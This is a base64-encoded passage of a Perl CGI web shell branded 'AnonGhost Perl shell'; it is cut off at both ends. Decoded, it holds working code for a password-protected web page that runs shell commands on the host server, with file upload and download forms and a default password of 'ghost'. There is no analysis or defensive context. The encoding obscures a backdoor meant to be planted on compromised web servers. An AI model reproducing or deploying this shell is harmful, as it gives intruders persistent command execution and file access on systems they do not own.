1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+QW5vbkdob3N0IFBlcmwgc2hlbGw8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJBbm9uR2hvc3QsQW5vbkdob3N0LEFub25HaG9zdC5pbmZvLGhhY2tlciI+DQo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5vbkdob3N0LEFub25HaG9zdCxBbm9uR2hvc3QuaW5mbyxoYWNrZXIiPg0KPC9oZWFkPg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiNGRkZGRkYiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgdGV4dD0iI0ZGMDAwMCI+DQo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4NCjx0cj4NCjx0ZCBiZ2NvbG9yPSIjRkZGRkZGIiBib3JkZXJjb2xvcj0iI0ZGRkZGRiIgYWxpZ249ImNlbnRlciIgd2lkdGg9IjElIj4NCjxiPjxmb250IHNpemU9IjIiPiM8L2ZvbnQ+PC9iPjwvdGQ+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgd2lkdGg9Ijk4JSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+PGI+IA0KPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+QW5vbkdob3N0IFBlcmwgc2hlbGw8L2I+IENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlVwbG9hZCBGaWxlPC9mb250PjwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RG93bmxvYWQgRmlsZTwvZm9udD48L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8DQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KPGZvbnQgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPHByZT48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vaW1nODEwLmltYWdlc2hhY2sudXMvaW1nODEwLzgwNDMvQW5vbkdob3N0MTIucG5nIj48L3ByZT48YnI+PGJyPjwvZm9udD48aDE+RGVmYXVsdCBQYXNzd29yZD1naG9zdDwvaDE+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQpUcnlpbmcgJFNlcnZlck5hbWUuLi48YnI+DQpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+DQpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dDQo8Y29kZT4kTWVzc2FnZQ0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxicj5sb2dpbjogYWRtaW48YnI+DQpwYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCjwvZm9udD4NCjxmb250IHNpemU9IjMiPg0KbG9naW46IDxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZmNjYiPkFub25HaG9zdCBQZXJsIHNoZWxsPC9iPjxicj4NCnBhc3N3b3JkOjwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMyI+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dvdXRTY3JlZW4NCnsNCglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCg0KCSZQcmludExvZ2luU2NyZWVuOw0KCSZQcmludExvZ2luRm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQNCiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QNCiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyDQojIHRvIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgcGFzc3dvcmQgZGlkbid0IG1hdGNoDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJCSZQcmludExvZ2luU2NyZWVuOw0KCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkDQoJCXsNCgkJCSZQcmludExvZ2luRmFpbGVkTWVzc2FnZTsNCg0KCQl9DQoJCSZQcmludExvZ2luRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgY29tbWFuZHMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQoNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPg0KT3ZlcndyaXRlIGlmIGl0IEV4aXN0czxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvDQojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMNCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIENvbW1hbmRUaW1lb3V0DQp7DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCQlwcmludCA8PEVORDsNCjwveG1wPg0KDQo8Y29kZT4NCkNvbW1hbmQgZXhjZWVkZWQgbWF4aW11bSB0aW1lIG9mICRDb21tYW5kVGltZW91dER1cmF0aW9uIHNlY29uZChzKS4NCjxicj5LaWxsZWQgaXQhDQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90I